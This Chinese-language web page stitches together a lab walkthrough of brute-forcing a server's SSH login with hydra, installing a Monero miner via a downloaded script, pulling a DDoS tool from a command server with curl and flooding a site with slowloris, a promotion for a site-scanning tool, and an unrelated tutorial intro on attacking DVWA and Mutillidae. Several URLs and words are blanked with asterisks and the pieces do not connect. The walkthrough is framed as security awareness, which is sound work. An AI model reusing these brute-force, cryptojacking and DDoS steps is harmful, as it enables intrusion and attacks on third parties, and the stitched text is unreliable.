眨眼间，2018 年的上半年就这样飞逝而过，在上半年的工作中，接触最常规的安全事件就是服务器或者办公主机被远控作为肉鸡挖矿来获取利益或者对其它网站进行 DDoS 攻击，今天分享一下如何利用 Linux 常规的 SSH 弱口令爆破 Linux 服务器并利用该服务器进行挖矿及对其它网站进行 DDoS 攻击，攻击即分析流程较为简单，如有不适之处，欢迎斧正。

　　使用的 Linux 服务器及搭建的站点源码及使用的域名如下：

　　Linux: Kali 2.0

　　IP：192.168.95.132

　　网站部署源码：DiscuzX.7z

　　部署工具：phpstudy

　　Website Domain: Cherishao.com

　　使用的工具如下：

　　SSH爆破：hydra-8.1-windows

　　远程终端管理：X term

　　分析工具：Wireshark

　　网上下载 DiscuzX 源码，利用 PHPStudy 快速建站工具，将其源码放在其 WWW 目录下，启动即可（阅读 README.md 文档）。

　　将自己的 IP 地址，绑定在自己注册的域名，添加解析记录即可：

　　利用安全工具对指定的平台服务器（该服务器提供了常见的 *** 服务，例如 Web 服务、终端服务等）进行 SSH 暴力破解攻击。攻击流程设计如下：

　　SSH 爆破

　　通过分析扫描目标站点（IP地址：192.168.95.132）服务器,发现服务器开启 SSH22 端口、操作系统类型为 Linux。

　　利用 hydra 进行 SSH 爆破获取服务器权限:

　　hydra -l root -P 字典 -V

　　通过暴力破解得到的 (root/123456) 进入服务器：

　　连接上服务器后，运行脚本获取远端挖矿程序。服务器当前状态：

　　利用服务器挖矿

　　获取安装脚本

　　wget --no-check-certificate -O mservice.sh

　　执行脚本开始挖矿

　　sudo bash mservice.sh 10014 #该ID可替换为自己的用户ID

　　服务器挖矿时的 CPU 状态（CPU 飙升到 96%）：

　　DDoS 攻击

　　利用该服务器对(网站: Cherishao.com ) DDoS 攻击。

　　从 C2 服务器，获取 DDoS shell

　　Curl

　　对该站点进行 DDos 攻击

　　slowloris.pl -dns cherishao.com -timeout 1 - num 1000

　　网站正常运行时状态：

　　Ddos 攻击后网站状态：

　　利用 Wireshark 抓包分析

　　挖矿数据流分析

　　从上图的通信数据流中，我们可以发现挖矿者使用的钱包地址:

　　42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

　　 *** ：

　　“XMRig/2.5.2”

　　Xig *** 特征

　　DDoS 数据流分析

　　通过分析发现对Cherishao.com网站的大量DNS请求包：

　　总结

　　近些年，新出现了众多入侵系统的手法，像 Apache Struts2 漏洞利用、Hadoop Yarn REST API未授权漏洞利用，但是古老的 SSH 暴力破解攻击手段不仅没有消亡，反而愈演愈烈。

　　本文通过这样一个简单的设计，主要是想传达：一但 Hacker 取得了我们系统的权限，他可以做比较多的事情，信息窃取，数据破坏，对外攻击等诸多对我们不利的事情，在日常的工作及生活中请加强密码防护策略的重视，加强自身安全意识。

　　相关附件

　　 密码：mp3l

　　参考链接

　　SSH 暴力破解趋势

　　

　　Web精灵是一款网站安全软件，该软件与一般的安全软件不同之处在于，该软件的检测方式是有效的模拟黑客攻击手段，模拟攻击制定的站点，从而从侧面得出网站漏洞，使用该 *** ，站长可以轻易知道网站漏洞所在，从而进行针对性优化。

　　震撼特效

　　软件横幅附带波浪特效，滑动鼠标体验一下。

　　高效检测

　　自动过滤无效漏洞地址，只显示正确漏洞地址。

　　指纹鉴定

　　有效识别CMS建站系统，更多CMS正在添加中。

　　霸道Ghost Shell

　　全自动检测是否存在Ghost拿Shell漏洞。

　　在本节中，我们将讨论如何攻击网站。对于攻击网站，我们有两种 *** ：

　　我们可以使用攻击迄今为止学到的网站 *** 的 *** 。因为我们知道网站安装在计算机上，所以可以像其他任何计算机一样尝试攻击和破解它。但是，我们知道网站安装在计算机上，可以像其他计算机一样尝试攻击和破解它。还可以使用服务器端攻击来查看安装了哪个操作系统，Web服务器或其他应用程序。如果发现了漏洞，我们可以使用它们中的任何一个来访问计算机。

　　另一种攻击方式是客户端攻击。因为网站是由人类管理和维护的。这意味着，如果我们设法破解网站的任何管理员，可能会获得他们的用户名和密码，并从那里登录到他们的管理面板或安 *** 接字Shell(SSH)。然后，我们将能够访问他们用于管理网站的任何服务器。

　　如果这两种 *** 都失败了，我们可以尝试测试Web应用程序，因为它只是安装在该网站上的应用程序。因此，攻击目标可能不是Web应用程序，也许我们的目标只是使用该网站的人，但其计算机无法访问。我们可以访问该网站，侵入该网站，然后从那里转到我们的目标人。

　　所有设备和应用程序都是互连的，我们可以利用其中一个设备和应用程序，然后转到另一台计算机或另一个地方。在本节中，我们将学习如何测试Web应用程序本身的安全性，而不是关注客户端和服务器端攻击。

　　我们将使用Metasploitable机器作为目标机器，如果运行命令，我们将看到它的IP是10.0.2.4，如下面的屏幕截图所示：

　　

　　如果我们查看文件夹，可以看到存储的所有网站文件，如以下屏幕截图所示：

　　

　　在上面的截图中，我们可以看到有页面，还有dvwa，mutillidae和phpMyAdmin。现在，如果我们在同一 *** 上的任何机器，并尝试打开浏览器并转到10.0.2.4，我们将看到有一个为Metasploitable *** 的网站，如给定的屏幕截图所示。网站只是安装在Web浏览器上的应用程序，可以访问任何Metasploitable网站并使用它们来测试其安全性：

　　

　　现在我们来看看DVWA页面。它需要用户名为，密码为才能登录。一旦我们输入这些凭据，我们就可以登录到它，如下面的屏幕截图所示：

　　

　　登录后，可以使用DVWA Security选项卡修改安全设置，如以下屏幕截图所示：

　　

　　在DVWA Security选项卡下，我们将Script Security设置为low并单击Submit：

　　

　　我们在接下来的部分将其设置为。因为这只是一个入门课程，我们只讨论在DVWA和Mutilliidae Web应用程序中发现Web应用程序漏洞的基本 *** 。

　　如果以与访问DVWA Web应用程序相同的方式访问Mutillidae Web应用程序，应确保将Security Level设置为，如以下屏幕截图所示：

　　

　　我们可以通过单击页面上的“Toggle Security”选项来切换安全级别：

　　

　　上一篇：

　　网站是什么？

　　下一篇：

　　信息收集

　　加 *** 群啦，易百教程官方技术学习群

　　注意：建议每个人选自己的技术方向加群，同一个 *** 最多限加 3 个群。